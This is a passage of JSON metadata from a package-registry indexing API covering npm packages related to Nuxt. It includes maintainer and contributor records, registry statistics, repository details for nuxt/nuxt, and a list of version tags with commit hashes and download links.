ste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xc6pm%2Fnuxt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xc6pm%2Fnuxt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xc6pm%2Fnuxt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xc6pm%2Fnuxt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xc6pm%2Fnuxt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@xc6pm%2Fnuxt/codemeta","maintainers":[{"uuid":"xc6pm","login":"xc6pm","name":null,"email":"h.ebr141@outlook.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~xc6pm","role":null,"created_at":"2025-08-05T19:51:21.816Z","updated_at":"2025-08-05T19:51:21.816Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/xc6pm/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096094,"name":"@nuxt/generator","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":67,"first_release_published_at":"2018-11-16T14:16:42.520Z","latest_release_published_at":"2024-06-28T11:34:28.819Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-11T01:23:11.924Z","created_at":"2022-04-08T10:39:24.158Z","updated_at":"2026-05-11T01:23:11.925Z","registry_url":"https://www.npmjs.com/package/@nuxt/generator","install_command":"npm install @nuxt/generator","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/a